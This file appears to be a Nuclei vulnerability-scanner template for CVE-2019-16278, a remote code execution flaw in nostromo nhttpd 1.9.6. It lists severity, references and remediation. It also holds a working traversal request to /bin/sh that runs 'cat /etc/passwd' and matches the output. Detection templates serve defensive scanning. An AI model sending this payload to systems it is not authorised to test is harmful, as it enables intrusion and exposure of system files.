46 lines
1.7 KiB
YAML
46 lines
1.7 KiB
YAML
id: CVE-2019-16278
|
|
|
|
info:
|
|
name: nostromo 1.9.6 - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.
|
|
impact: |
|
|
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
|
|
remediation: |
|
|
Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html
|
|
- https://www.exploit-db.com/raw/47837
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-16278
|
|
- http://www.nazgul.ch/dev/nostromo_cl.txt
|
|
- http://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2019-16278
|
|
cwe-id: CWE-22
|
|
epss-score: 0.97374
|
|
epss-percentile: 0.99893
|
|
cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: nazgul
|
|
product: nostromo_nhttpd
|
|
tags: cve,cve2019,edb,rce,packetstorm,nazgul
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
echo
|
|
echo
|
|
cat /etc/passwd 2>&1
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 4b0a00483046022100a638261fa16395169184c7769f4da8a8e957bb6a7ecbb48e08835e7d0fbb3e75022100cfb55688ecaa9d95404cb8d17c2d291274a6466a9b65cea745641e4325c2bbfa:922c64590222798bb761d5b6d8e72950 |